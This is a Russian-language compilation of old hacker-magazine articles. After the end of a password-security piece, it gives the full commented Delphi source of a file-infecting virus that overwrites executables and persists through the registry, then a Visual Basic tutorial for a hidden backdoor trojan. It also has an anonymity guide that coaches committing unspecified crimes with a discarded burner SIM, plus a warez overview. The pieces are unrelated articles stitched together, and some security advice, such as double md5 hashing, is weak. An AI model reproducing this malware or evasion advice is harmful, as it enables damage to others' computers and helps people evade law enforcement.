* замена букв на цифры, схожие но начертанию (1slam)
* запись прямым/обратным транслитом (морж = morzh; billgates = биллгейтс)

Возможно применение нескольких правил одновременно, но даже это не дает надежной защиты от атаки по словарю, так как взломщик может модифицировать исходный пароль тем же самым путем.

Мне показалось интересным то, что популярные пароли могут изменяться с течением времени. Связано это с несколькими причинами. Популярное в реальной жизни становится распространено и в виртуальной. Так пароль matrix, который в конце 80-х - начале 90-х использовали разве что математики, с выходом одноименного фильма занимает 29 место в списке популярных паролей. Точно также влияют на выбор пароля и известные музыкальные группы (tatu), книги (Pelevin), программы (windows). Еще одним важным фактором является популяризация интернета в целом - в сеть приходит множество новых людей, которые могут и не иметь понятия о компьютерной безопасности. Это приводит к широкому использованию простейших паролей, а следовательно и увеличению числа взломов.

Coda

Проанализировав довольно большое количество паролей, я хотел бы дать несколько советов, которые, как мне кажутся, помогут вам избежать утечки информации. Многие из них банальны, но как показала практика не соблюдаются в большинстве случаев, поэтому напомнить их будет не лишним.

Советы пользователям. Самый важный совет - никогда не используйте одинаковые пароли для доступа к разным системам! Даже если он кажется абсолютно устойчивым и надежным, например V1!2cEqP,@#19r. Взломщик может получить ваш пароль для доступа к одной системе, используя какую-либо уязвимость в ней. И это будет не ваша вина, а вина программистов. Но если он, получив один пароль, сможет получить контроль над всей вашей деятельностью в сети - это будет целиком на вашей совести.

Теперь поговорим о выборе пароля. Никогда не используйте пароли, состоящие только из цифр. Количество возможных комбинаций из цифр невелико (при желании - рассчитайте его по формуле) и такой пароль может быть подобран относительно быстро даже при удаленной атаке. Проверьте пароль, используемый вами - если в свободной таблице он попадает в оранжевые ячейки, то можно утверждать, что он не надежен. Ваша цель при создании пароля - достичь максимально разумного числа символов в исходном наборе (используйте разный регистр и специальные символы). Не используйте осмысленные пароли и их модификации. Взломщику не составит большого труда подобрать его. Не думайте, что система блокирования IP-адреса после определенного числа попыток войти в систему с неверным паролем защитит вас - посмотрите список прокси-серверов на http://samair.ru/proxy/ и убедитесь, что это лишь ширма, а не защита.

Если ваш пароль ненадежен - смените его сейчас, не ждите, пока кто-нибудь получит доступ к вашей конфиденциальной информации. Вполне возможно, что уже сейчас почта с вашего почтового ящика перенаправляется конкурентам, а вы даже не подозреваете об этом. Очень рекомендуется менять пароли для доступа к важным для вас сервисам хотя бы раз в месяц.

Еще один важный аспект защиты - системы восстановления забытых паролей. Многие выбирают вполне достойные пароли, которые не по зубам взломщикам, но оказываются уязвимыми через эти системы.

Во-первых, никогда не указывайте несуществующий ящик в качестве альтернативного почтового адреса, на который будет высылаться пароль, - взломщик может воспользоваться этим. Зарегистрировав этот аккаунт на себя, получение вашего пароля будет делом нескольких минут. Во-вторых, очень важным является контрольный вопрос, который позволяет восстановить забытый пароль. Никогда не указывайте в ответе на него свои личные данные (год рождения, кличку собаки, девичью фамилию матери) - взломщик может с легкостью получить эту информацию, используя либо поиск в интернете, либо социальную инженерию. Во втором случае вы или ваши близкие (сослуживцы, родственники) сами с удовольствием раскроете взломщику эту информацию. Идеальным вариантом будет указать в ответе на контрольный вопрос случайный набор символов.

Еще несколько банальных советов. Регулярно обновляйте антивирусный софт, установите на ваш компьютер файрвол. Используйте альтернативный браузер (Opera) и почтовый клиент (The Bat!). Львиная доля уязвимостей в ПО, используемых взломщиками, приходится на продукты компании Microsoft.

Советы администратору. Введите систему контроля над паролями, которые выбирают пользователи. Лучше всего требовать наличия в нем букв и цифр, причем цифр не в начале или конце пароля, а в середине (хотя это и не убережет от паролей типа pass123pass, но множество глупых паролей будет отсеяно). Ограничивайте минимальную длину пароля хотя бы шестью символами. Не ограничивайте максимальную длину пароля (на мой взгляд, все разумные причины для этого не актуальны на текущей стадии развития аппаратного обеспечения).

Продумайте систему восстановления забытых паролей. Я считаю, что восстановление путем ответа на контрольный вопрос - недостаточно надежная схема. Множество паролей взламывается именно через контрольный вопрос. Если вы не хотите потом разбираться, кому на самом деле принадлежит учетная запись, не используйте такую систему. На мой взгляд, хороший метод восстановления пароля - это высылка на указанный при регистрации почтовый ящик. Желательно высылать не старый пароль, а заново сгенерированный. Это поможет избежать шпионажа или действий от лица другого человека, а также взлома аккаунтов пользователя на других системах.

В большинстве сетевых приложений сейчас используется аутентификация на базе алгоритма md5, который, хоть и надежен, довольно неустойчив при использовании слабых паролей. Существует разные системы для защиты хэшей, хранящихся в базе данных, от взлома методом грубой силы. Например я встречал такой совет: "храните не весь хэш, а лишь его первые 16 символов, что затруднит атакующему ввод таких "огрызков" в программу для взлома, а вероятность совпадения первых 16 байт для разных паролей довольно мала." Более того, я встречал такой метод реализованным на практике. Это не самый лучший выход, так как допускает коллизионность паролей, а реальных препятствий взломщику не создает никаких.

Самым простым в реализации и дающим защиту от большинства взломщиков мне кажется следующий метод. Храните в базе данных не хэш пароля, а хэш хэша, то есть значение функции md5(md5(password)). При логине пароль просто хэшируется два раза и полученное значение сверяется с хранящимся на сервере. Взломщик же сталкивается с несколькими трудностями. Во-первых ему надо еще определить что это не хэш самого пароля (а с первого взгляда это сделать невозможно - сказывается свойство, по которому результатом работы функции является значение фиксированной длинны). Во-вторых - публичных программ для взлома такого типа не существует. Придется или разрабатывать свою программу или идти на какие-либо ухищрения. Это даст защиту от взломщиков-киддисов (а их сейчас большинство), которые используют программы, разработанные другими, и уязвимости, найденные не ими. Можно пойти дальше и хранить пароль, хэшированный не два, а три или более раза. В этом случае еще и существенно замедляется скорость локального перебора паролей.


Вирус на DELPHI
Большинство пользователей и даже некоторые программисты считают, что все вирусы пишутся в основном на ассемблере, иногда на Си, а на других языках даже помыслы об ЭТОМ считаются греховными. Это, разумеется, бред (бред- ложное умозаключение, возникающее на фоне болезни, не поддается логической коррекции). На самом деле вирусы можно писать на чем угодно- прологе, коболе, васике а также на стенах в сортире- были бы руки прямые. Мы будем писать на Дельфи. Итак, понятие о вирусе. Прежде всего, вирус- это программа. Точное определение этому волшебному явлению еще не придумал даже Лозинский, однко общие функции вируса таковы- саморазмножение, заражение программ, выполнения других задач, заложенных в него автором- Format C:, звуковые эффекты и пр. Разные вирусы отличаются друг от друга способами заражения и распространения, а также размером. Здесь я не буду приводить классификацию всех вирусов, а коснусь только близких нам- высокоуровневых.
Классификация.
HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.о. программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и “заражает” дальше.
HLLC- High Level Language Companion. Большинство таких вирусов относятся к седой древности (6-7 лет назад), когда у пользователей стоял ДОС и они были очень ленивы. Эти вирусы ищут файл, и не изменяя его, создают свою копию, но с расширением .COM. Если ленивый пользователь пишет в командной строке только имя файла, то первым ДОС ищет COM файл, запуская вирус, который сначала делает свое дело, а потом запускает ЕХЕ файл. Есть и другая модификация HLLC- более современная: Вирус переименовывает файл, сохраняя имя, но меняя расширение- с ЕХЕ на, допустим, OBJ или MAP. Своим телом вирус замещает оригинальный файл. Т.о., пользователь запускает вирус, который, проведя акт размножения, запускает нужную программу- все довольны.
HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди. Первым стартует вирус, затем он восстанавливает программу и запускает ее. С написанием таких вирусов под Win связана проблема- Windows запрещает доступ к запущенному файлу- т.е. мы не можем читать “из себя”.

Ну с классификацией я закончил, теперь прочитай свод базовых знаний (типа, курс лекций), и можно приступать к осваиванию исходника. Итак, что же нам нужно знать:
Работа с файлами- вирус довольно активно с ними общается:

1.Связь с файлом: procedure AssignFile(var F; FileName: string);
Например: AssignFile (F1,’klizma.exe’);

2.Открытие файла для чтения: procedure Reset(var F [: File; RecSize: Word ] );
Например: Reset (F1);

3.Чтение инфы из файла в буфер: procedure BlockRead(var F: File; var Buf; Count: Integer [; var AmtTransferred: Integer]);
Здесь buf- массивчик, напр. Buf: Array [1..65535] Of Char;
Count- сколько байтов ты хочешь прочесть
AmtTransfered- сколько реально прочитано.
Например: BlockRead (F1,Buf,1024);

4.Запись из буфера в файл: procedure BlockWrite(var f: File; var Buf; Count: Integer [; var AmtTransferred: Integer]);
Почти то же, что и предыдущее.

5.Открытие файла на запись, вся запись будет проводиться в конец файла: Append (F: File);

6. Открытие файла для перезаписи: procedure Rewrite(var F: File [; Recsize: Word ] ); Содержимое файла при этом обнуляется.

7.Поиск файла. Без него нам никак не обойтись, надо же искать жертву J. function FindFirst(const Path: string; Attr: Integer; var F: TSearchRec): Integer;
Attr- атрибуты файла, например faAnyFile- любой файл, faArchive- архивный, faHidden- скрытый.
F- переменная типа TsearchRec, в нее дельфи запихивает все хар-ки найденного файла.
Например: FindFirst (‘*.exe’,faAnyFile,sr);
Sr.Name- имя найденного файла
Sr.Size- его размер.
Чтобы искать следующий такой же файл, пиши FindNext (Sr);
Если файл найден, то процедуры FindFirst и FindNext возвращают 0 (зеро). Подсказываю: можешь в своем вирусе создать интересный циклик:

Result:= FindFirst (‘*.exe’,faAnyFile,sr);
While result=0 do
Begin
//Сюда пишешь процедуру заражения
FindNext (sr);
End;

8.Закрытие файла, все наши с ним извращения сохраняются: procedure CloseFile (var F: File);

9.Сдвиг рамки считывания: procedure Seek(var F; N: Longint);
Поясню попонятнее: допустим, надо прочесть кусок объемом 1000 байт из файла в 3000 байт так, чтобы последний байт попал в буфер; ясно, что считывание надо начить (и потом углубитьJ) не с отметки 0 а с отметки 1000 байт! Посему пишем: Seek (F1,1000); А потом уже BlockRead (…);

10.Иногда,если чего-то не получилось, важно быть об этом проинформированым. Допустим, надо узнать, удалось ли чтение из файла. Непосредственно после BlockRead пишем: IF Ioresult=0 then… Если ноль, то все успешно, если нет- возвращается код ошибки. Такой прием возможен, только если {$I-}!

11.Когда необходимо завершить программу, не особо удивляя при этом юзера (например в HLLO вирусах, когда нет программы для запускаJ) лично я вызываю старый добрый stack overflow:

function BlowTheStack(I: Integer): Integer;
var
J: Integer;
begin
J:= 2;
Result:= BlowTheStack(I*J);
end;

12.Установка атрибутов файла: FileSetAttr (Filename: string,FileAttr);
Например: FileSetAttr (‘klizma.exe’,faHidden);
Fileattr- как в findfirst.

Итак, если ты дочитал досюда- ставлю ящик пива, лично я бы давно уже завязал J. Открывай теперь исходник, там все подробно откомментировано, а здесь я поясню только общие принципы.
Это извращение- вирус типа HLLC, весьма простой- вообще и для понимания в частности. Алгоритм его таков: при заражении вирус исходный файл переименовывает в нечто случайное и помещает в каталог c:\windows\ или где там винды (это в боевой версии, в моем исходнике вся возня происходит в директории c:\INF\). Своим телом вирь замещает оригинальный файл, причем если оригинал больше виря менее, чем вдвое, вирь добавляет к себе кусочек себя же J, чтобы не отличится по размеру от оригинала. В каталоге с виндами создается также занимательный файл- filelist.ini, в котором вирь фиксирует зависимость между оригинальным и случайным именами файла (т.е. при запуске вирь получает имя своего файла, допустим winword.exe, смотрит в каталог и видит там: winword.exe= 34258352.340., затем переименовывает этот цифирный файл в свой каталог, но с именем winword.exe(впереди- пробел или символ “_”), и запускает этот “левый” файл. После завершения работы левого файла управление получает вирь, ища и заражая файлы). При первом старт
С алгоритмом заражения и старта вроде, все. Кстати, для чтения и записи в файл я использовал такую могучую вещь, как TfileStream. Что это такое и с чем кушать- посмотри в хелпе, хотя по исходнику это и так понятно. Чтобы гонять вирь на своем компе, и не опасаться злых духов надо создать каталог c:\INF, и все действия проводить там- как видно из исходника, вирь только там и может работать- что поделаешь, небоевая версия…
Совет напоследок.
Вирь после компиляции будет весить поболее 200 Кб (царский размер!), поэтому напрягись и сожми его NeoLite’ом- хороший пакер для EXE и DLL файлов, с дельфийских прог сносит ~40% избыточного веса, а с опцией MaxCmp файл обратно уже не распаковывается. Взять его можно тут: www.neoworx.com, весит он 568Кб.
P.S. Чти УК РСФСР, как чту его я! Написание вирусов, наверное, наказуемо по статье 273. И если ты придешь в отделение милиции в майке с исходным текстом своего вируса, обвешанным дискетами с ним же и чистосердечно во всем признаешься, тебя посадят. На 15 суток, за хулиганство и нарушение общественного порядка!

Примечание VR-online.
На этом теоретическая часть статьи заканчивается, остаётся только отдать исходник. Исходник я не дам качать просто так, потому что я не поддерживаю тех, кто пишет вирусы. Но только для обучения я привожу его как текст к статье.
Предупреждаю, что я сделал тут несколько незначительных ошибок, чтобы начинающие программисты не навредили себе и другим. Если ты обладаешь хотя бы начальными знаниями в Delphi, то ты исправишь эти ошибки без проблем. И надеюсь, что не будешь использовать знания в разрушительных целях, а наоборот воспользуешься ими для защиты себя и окружающих. Помни, что ты не станешь лучше если уничтожишь компьютер соседа.
Исходник:

{====[BLACK MAMMONTH VIRUS, ОБУЧАЮЩАЯ ВЕРСИЯ. MADE IN USSR, Dr.Klouniz]====}
{ КАК ИГРАТЬСЯ С ЭТИМ ВИРУСОМ. ЮЗЕР МАНУАЛ:
1.Создаем каталог c:\inf
2.Компилируем вирус (Project--> Build)
3.Cравниваем размер полученного файла с константой VIRLEN; если не совпадает-
измени константу и перекомпилиру }
4. Переписываем в каталог c:\inf несколько exe-файлов и вирус. Запускаем вирус.

--------------------------------------------------------------------------------
}
{$I-} //Игнорировать I/O ошибки
{$D-} //Не вводить в код отладочную информацию
program VirDebug;
uses sysutils, //Заголовочные файлы
windows,
registry, //Работа с системным реестром
classes,
inifiles; //Работа с INI-файлами
ConST VIRLEN= 296960; //Длина нашего вируса. После компиляции сравните получ.
//размер с указанным здесь, при необходимости измените и перекомпилируйте
var
zertva,virus : TFileStream; //Мы и жертва
//буфера для чтения записи довеска и вируса
vir,dovesok : array [1..VirLen] OF Char;
result : integer; //результат FindFirst'а
client,sr : TSearchRec;
//Массив имени файла
Name : array [1..8] Of String;
//Массив расширения файла
Ext : array [1..3] Of String;
//Наш INI-каталог; вирус- полноценная прога под WindoZ!
Info : TINIFILE;
NewName,pr,par,FromF : string; //Разные строчки
//Дата как метка зараженности
Birth : TDateTime;
kill,slay,winvir,NewProga : file; //файлы
//Индикатор зараженности (TRUE/FALSE)
infected : boolean;
//Текстовый файл-визитка; свидетельствует о том, что это не первый
//старт виря на данном компьютере
check : textfile;
si : Tstartupinfo;
p : Tprocessinformation;
reg : TRegistry;
// Функция- копировалка
function WindowsCopyFile(FromFile, ToDir : string) : boolean;
var
F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION;
result:=ShFileOperation(F) = 0;
end;
PROCEDURE INFECTFILES; //Процедура-инфектор
begin
//Находим исполн. файл в каталоге c:\inf\
result:= FindFirst ('c:\INF\*.exe',faAnyFile,client);
WHILE Result= 0 DO //Если нашли, то...
begin
//Проверка на вшивость
Infected:= false;
//если дата- 09.08.83 и время 6:00, то файл заражен и нам не нужен
IF DateTimeToStr (FileDateToDateTime (fileage ('c:\INF\'+client.name)))=
'09.08.83 06:00:00' then infected:= true;
//Проверено!
//если мы нашли не сами себя и не зараженный файл, то...
IF (client.name<>sr.name) and (infected= false) and
(client.name<>'mammonth.exe') then
. //Сочиним новое имя для нашей жертвы;
begin
Name[1]:= inttostr (random(10));
Name[2]:= inttostr (random(10));
Name[3]:= inttostr (random(10));
Name[4]:= inttostr (random(10));
Name[5]:= inttostr (random(10));
Name[6]:= inttostr (random(10));
Name[7]:= inttostr (random(10));
Name[8]:= inttostr (random(10));
Ext [1]:= inttostr (random(10));
Ext [2]:= inttostr (random(10));
Ext [3]:= inttostr (random(10));
NewName:= name[1]+name[2]+name[3]+name[4]+name[5]+name[6]+name[7]+
name[8]+'.'+ext[1]+ext[2]+ext[3]; //скомпонуем новое имя
//Свяжемся с нашей жертвой
AssignFile (Kill,'c:\INF\'+client.name);
//Отправим ее в загон для всех таких же, с уникальным именем
ReName (Kill,'c:\INF\files\'+NewName);
//Фиксируем новое имя в нашем каталоге
Info:= TIniFile.create ('c:\inf\filelist.ini');
WiTh info do
begin
//Пишем данные с каталог в виде Исходное_имя_файла=Новое_имя_файла
WriteString ('FILELIST',client.name,NewName);
free;
end;
//А теперь заразим страшным ВИРУСОМ наш файл!
//Открываем на чтение наш семенной фонд :)
||virus:= TFileStream.create ('c:\inf\mammonth.exe',fmOpenRead);
Virus.Read (vir,VirLen); //Читаем вирус полностью (константу VirLen помнишь?)
//Если клиент поболее нас, но не более чем вдвое,
IF (Client.Size>VirLen) AnD ((Client.Size-VirLen)<=VirLen) then
//то сравняем размеры
begin
Virus.Position:= 1; //Рамка считывания- сначала
Virus.Read (Dovesok,Client.Size-VirLen); //читаем довесок
end;
//перепишем жертву по- нашему
zertva:= TFileStream.create ('c:\inf\'+client.name,fmCreate);
zertva.Write (vir,virlen); //Запишем себя в жертву
IF (client.size>virlen) AND ((Client.size-VirLen)<=VirLen) then
zertva.write (dovesok,client.size-virlen); //И сверху еще довесок
Birth:= StrToDateTime ('09.08.83 06:00:00');
//поставим жертве индикатор зараженности
FileSetDate(Zertva.Handle,DateTimeToFileDate (birth));
Zertva.FREE; //Отпускаем жертву!
Virus.FREE;
end;
Result:= FindNEXT (Client); //Ищем следуюущий екзешник
end;
end;
PROCEDURE REGISTRATION;
begin
//первый раз, в первый класс!
MkDir ('c:\inf\files'); //Создадим загон для жертв
AssignFile (check,'c:\inf\present.dat'); //Делаем файл-визитку
ReWrite (check);
WriteLn (check,'BLACK MAMMONTH virus is now active in this computer');
CloseFile (check); //Сделано!
par:= ParamStr (0); //Посмотрим полное имя нашего файла с путем
WindowsCopyFile (Par,'c:\inf\'); //скопируем его в рабочий каталог (папку:))
AssignFile (winvir,'c:\inf\'+sr.name); //Найдем его в рабочем каталоге
ReName (winvir,'c:\inf\mammonth.exe'); //...И переименуем в mammonth.exe
Reg:= TRegistry.Create;
//И пусть этот маммонт запускается каждый раз!
FileSetAttr ('c:\inf\mammonth.exe',faHidden);
With Reg do
begin
IF OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true) then
begin
WriteString ('MAMMONTH','c:\windows\mammonth.exe');
CloseKey;
end;
end;
//Все. Мы в реестре.
//Халтим вирус с правдоподобным сообщением-
//сюда можно вписать процедуру вызова StackOverflow
end;
//Процедура исполнения оригинальной проги
PROCEDURE EXECPROGRAM
begin
Info:= TIniFile.Create ('c:\inf\filelist.ini'); //Заглянем в каталог
FromF:= Info.ReadString ('FILELIST',Sr.Name,'NewName');
//Вытащим из загона нужный файл
WindowsCopyFile ('c:\inf\files\'+FromF,'c:\inf\');
AssignFile (NewProga,'c:\inf\'+FromF);
ReName (NewProga,'c:\inf\'+'_'+Sr.Name); //сделаем левый файл
PR:= 'c:\inf\'+'_'+Sr.Name;
Info.Free;
//Создали, теперь заКапустим его!!!
FillChar( Si, SizeOf( Si ) , 0 );
with Si do
begin
cb := SizeOf( Si);
dwFlags := startf_UseShowWindow;
wShowWindow := 4;
end;
//Application.Minimize;
Pr:= Pr+#0;
Createprocess(nil,@Pr[1],nil,nil,false,Create_default_error_mode,nil,nil,si,p);
Waitforsingleobject(p.hProcess,infinite);
//Application.Restore;
//Все, отпахала юзерская прога- потрем ее на хрен!
AssignFile (slay,pr);
Erase (slay);
end.
{
--------------------------------------------------------------------------------
КОНЕЦ ПРОЦЕДУРНОЙ ЧАСТИ
--------------------------------------------------------------------------------
}
begin
//узнаем имя файла, откуда стартовали
FindFirst (ParamStr(0),faAnyFile,sr);
//А вдруг первый раз на этом компе???
AssignFile (check,'c:\inf\present.dat');
Reset (check);
IF IOresult <>0 then //Если нашего файлика-визитки нет, пора зарегиться тут
begin
REGISTRATION;
INFECTFILES;
HaLt;
end;
IF sr.name= 'mammonth.exe' then
begin
//Можно запустить инфект файлов, но лучше вписать сюда какой-нибудь прикол
//INFECTFILES;
HALT;
end;
INFECTFILES;
EXECPROGRAM;
{++++END OF THE WORLD NEAR++++}
end.






Максимальная анонимность
1.) Забудьте про Internet Explorer.
2.) Пользуйтесь либо Opera, либо Mozilla Firefox.
3.) Не берите из Интернета первые попавшиеся прокси.
4.) Забудьте про свою лень.
5.) Не регистрируйтесь на сайтах,
посещать которые в будущем Вы не собираетесь.

Теперь объясню почему нужно соблюдать правила описанные в вышеуказанных пунктах.

Я не анти-фанат компании Майкрософт, Бил Гейтс внёс довольно большой вклад
в развитие информационных технологий и не только в них.
Internet Explorer предназначен исключительно для простых пользователей,
для сёрфинга он не подходит. Использовать Internet Explorer крайне не рекомендую, по крайней мере на момент написания этой статьи.

Пользоваться Opera или Mozilla Firefox нужно для того,
чтобы запретить отправку лишних логов на посещаемый Вами сервер.
Советую всё таки использовать Mozilla Firefox.

Не берите прокси которые нашли на каком нибудь левом сайте.
Если установить в настройках обозревателя прокси,
который принадлежит спец-службам - считайте что Вы уже под колпаком.

Никогда не ленитесь и будьте терпеливы.

Не желательно регистрироваться на сайтах, посещение которых в дальнейшем Вы не намечаете, лишний раз светится ни к чему.

И наконец завершающая стадия статьи, собственно цель которой было донести до Вас информацию описанную ниже.

Метод создания максимальной анонимности в Интернете через настольный компьютер довольно прост.

Первое что нужно сделать - это скачать Mozilla Firefox, в настройках обозревателя отключить Java, JavaScript, cookies и графику.
Таким образом сервер который Вы посетите получит только Ваш ip и версию операционной системы, разрешение экрана и другие логи к нему не поступят.
Отключать графику и cookies не обязательно, но без графики страницы через прокси будут грузится быстрее. А cookies желательно отключить для запрета попадания логов к Вам на компьютер, думаю компромат на своей машине хранить Вам не захочется.

Теперь установите себе программу Mask Surf Standard,
запустите её и настройте все параметры на максимальную анонимность.
То-есть в меню "Маскировка" установите галочки на пунктах "Невидимый".
В меню "Режим" выберите пункт "Максимальная анонимность".
Это и всё что нужно было проделать. Теперь можете спокойно проверять себя на анонимность.

Если Вы проделаете всё что я описал - на сервер не будет поступать не каких логов, кроме прокси, но Mask Surf Standard работает через цепь прокси-серверов которые отследить довольно проблематично (это не значит, что невозможно) и Вам не нужно искать их по Интернету, потому что они определяются автоматически, каждые 30 минут у Вас будет новый прокси.
Всё это естественно спецслужбами довольно просто отслеживается и если Вы ставите серьёзные задачи, то это не поможет.

Ходят слухи что в сети нету 100% анонимности и многие в это верят.
Скажу так, в сети есть всё, стоит только подумать.

Берите ноутбук и левую симку, езжайте в лес и делайте то, что хотели.
Если в летнее время с 8 утра до 8 вечера Вы побудете в лесу - ничего с
Вами не случится, всё таки куда лучше чем потом на зоне время убивать.

Предположим приехали Вы в лес, настроили все параметры своего ноутбука, выходите в сеть с левой симки и делаете свои чёрные дела.
За день Вас никто не надёт, но то что задумали - сделать наверняка успеете.
Когда будете уходить из леса, не вздумайте брать симку с собой домой - выкиньте её на месте и забудьте. Её местонахождение определят с точностью до 10 метров. Ноутбук не везите в открытую, прячьте его в какую нибудь сумку как у бабушек чтобы не вызывать подозрения. Сделайте просто вид, что Вы обычный колхозник.


Создание трояна
Для начала разберёмся с классификацией троянов. Трояны делятся на несколько категорий: BackDoors, Nukers и т.д. В этой статье мы будим говорить о создании собственного BackDoor'а, а точнее программы скрытого удалённого администрирования. Такие программы состоят из 2-х частей: одна - сервер, а другая - клиент. На компьютер жертвы засылается сервер. Именно он скрывается от пользователя. Файл сервера при запуске автоматически копируется в каталог Windows или системный каталог, а также скрывается из диалога "Завершение работы программы", который вызывается нажатием Ctrl+Alt+Delete. Во время работы, сервер открывает какой-нибудь порт от 1-ого до 65535-ого, и ждёт там клиента. Оыбчно сервер открывает порт на TCP протоколе. После того, как клиент подключиться к серверной части, он начинает посылать ей команды. Командами являются просто сочетания символов, обычно в виде слов, чтобы автору трояна не мучиться :о) Какие именно он придумает команды - нужно только догадоваться.

Итак. Как мы и обещали, приступаем к созданию программы. Сначала напишем сервер. Для этого создаём новый проект на Visual Basic в виде стандартного EXE. Далее подключаем к нему Microsoft Winsock Control: в меню "Project"->"Components..."

Если в списке его нет, то нажмите "Browse" и выберете файл "mswinsck.ocx". Тепрь ставим на форму этот компонент. Он нам нужен для свази клиентской и серверной части по TCP протоколу. Далее изменяем форму: убираем заголовок, делаем малые размеры и visible формы ставим на False. У компонента меняем имя на "ws" и свойству LocalPort присваиваем число, которое и будет номером порта, например 123.

Теперь попробуем запустить программу. У вас ничего не должно появиться. Завершаем работу программы нажатием кнопки "стоп".

Начинаем писать код программы. В Form_Load пишем:
Private Sub Form_Load()
Do
If ws.State sckConnected And ws.State sckListening Then
ws.Close
ws.Listen
End If
DoEvents
Loop
End Sub
Здесь, если мы ни с кем не соеденины и не прослушиваем порт, закрываем связь в ws и открываем 123 порт в ожидании клиента. Условие на состояние связи в ws нужно повторять во время работы программы для того, чтобы избежать случая, который возникает при разрыве связи. Т.е. вы начинаете случать порт, затем подключается удалённый компьютер, а после его отключения порт слушаться уже не будет. Вот значения, которые может принимать свойство State:

Константа Значение Описание
sckClosed 0 Такое значение стоит при запуске программы или когда порт закрыт
sckOpen 1 Порт открыт
sckListening 2 Порт прослушивается
sckConnectionPending 3 Connection pending
sckResolvingHost 4 Resolving host
sckHostResolved 5 Host resolved
sckConnecting 6 Подключение к хосту
sckConnected 7 Связь установлена
sckClosing 8 Связь закрывается...
sckError 9 Ошибка

Теперь нужно подключить клиента. Для этого в ws_ConnectionRequest, т.е. в запросе на соединение пишем:
Private Sub ws_ConnectionRequest(ByVal requestID As Long)
ws.Close
ws.Accept requestID
End Sub
Здесь мы сначала прекрашаем слушать, а затем подсоединяем клиента по номеру его запроса. На этом код по соединению двух программ закончен. Далее разбираем код для ws_DataArrival. Он будет вызываться, когда будут приходить какие-нибудь данные от сервера.
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
ws.GetData Data

Select Case Data
Case "BEEP"
Beep
Case "MSG"
MsgBox "Привет!", vbInformation, ":o)"
Case "END"
End
End Select
End Sub
В этом коде тоже всё просто. Сначала объявляем переменную Data, которая будет содержать пришедшие данные, а затем записываем их. После этого просматриваем все возможные варианты, т.е. команды, которые могли прийти от сервера. Здесь их три: BEEP, MSG, END. То, что они делают, думаю, объеснять не надо. Теперь остаётся скомпилировать программу. Назовём её "server.exe".

Приступим к написанию клиентской части. Создадим новый проект и форму, как на рисунке:

Поставьте на форму 2 текстовых поля и назовите их "IP" и "Port", затем две кнопки с надписями "Подключиться" и "Отключиться", и 3 кнопки с надписями "Бип!", "Сообщение" и "Закрыть сервер". Имена кнопок оставьте стандартными. Теперь добавьте Winsock Control и назовите его "ws". Поскольку наш сервер работает на 123 порту, то свойству Text второго текстового поля можно сразу присвоить значение "123". Текст первого поля будет значение IP адреса данного компьютера. Для этого пишем:
Private Sub Form_Load()
IP.Text = ws.LocalIP
End Sub
Теперь запущенная программа может выглядеть примерно так:

Продолжаем писать код.
Private Sub Command1_Click()
ws.Close
ws.RemoteHost = IP
ws.RemotePort = Port
ws.Connect
End Sub

Private Sub Command2_Click()
ws.Close
End Sub
При нажатии на кнопку "Подключиться", мы закрываем связь, указываем удалённый IP и порт и подключаемся. Кнопка "Отключиться" просто закрывает связь.
Private Sub Command3_Click()
If ws.State sckConnected Then Exit Sub
ws.SendData "BEEP"
End Sub

Private Sub Command4_Click()
If ws.State sckConnected Then Exit Sub
ws.SendData "MSG"
End Sub

Private Sub Command5_Click()
If ws.State sckConnected Then Exit Sub
ws.SendData "END"
End Sub
В последних трёх кнопках программа сначала проверяет связь, и, если соединено, то посылает команду.

Теперь компилируем программу в "client.exe". Можно протестировать троян. Для этого запустите "server.exe", а затем "client.exe" и попробуйте подключиться. Если не было ошибок, то понажимайте на кнопки команд. Теперь сервер можно закрыть из списка задач (Ctrl+Alt+Delete).

Вот в принципе и всё. Если вы хотите скрыть своего трояна из списка задач, то в объявлениях формы сервера подключите функцию RegisterServiceProcess, а также измените Form_Load:
Private Declare Function RegisterServiceProcess Lib _
"kernel32.dll" (ByVal dwProcessId As Long, ByVal _
dwType As Long) As Long

Private Sub Form_Load()
RegisterServiceProcess 0, 1
Do
If ws.State sckConnected And ws.State sckListening Then
ws.Close
ws.Listen
End If
DoEvents
Loop
End Sub


Warez, cracks, keygen, patch и все-все-все

Суть в определении

Слово «Warez» является производным от английского слова «wares», сокращенной формы множественного числа от «software». Подобрать точное определение этому термину на русском языке невозможно, но когда мы имеем в виду «warez», у нас должен возникать следующий ассоциативный ряд: нарушение авторских прав (неконтролируемое и нелегально распространение программ), изменение изначального программного кода (не всегда) или создание особых условий для работы софта (например, использование видоизмененной программной библиотеки или эмуляция среды (характерно, например, для неофициальных прошивок Windows Mobile-устройств)).
: «wares» переводится как товары (как правило, этим словом обозначаются мелкие предметы продажи, торговля которыми ведется обычно не в магазине, а с рук (на улице, на рынке и т. д.); в единственном числе не употребляется)

Как гласит легенда, термин «warez» возник на заре Интернета, когда стали появляться первые коммерческие продукты, которые стали незаконно копировать (то есть из одной копии делать несколько, именно отсюда получилось множественное число слова). В то время ни о какой высокой скорости передачи данных говорить не приходилось (максимум — 33, 6 кбит/с, максимальная скорость телефонного модема в начале 1990-х годов), поэтому обмениваться дистрибутивами в Интернете, как это происходит сейчас, никто толком не мог. Тот, кто смог заполучить копию лицензионного софта, просто вывешивал объявление в BBS (Bulletin Board System), то есть досках объявлений, и тогда уже на него «выходили напрямую». В итоге получалось нечто похожее на биржу, где товаром было программное обеспечение, на сленге и называемое «warez».

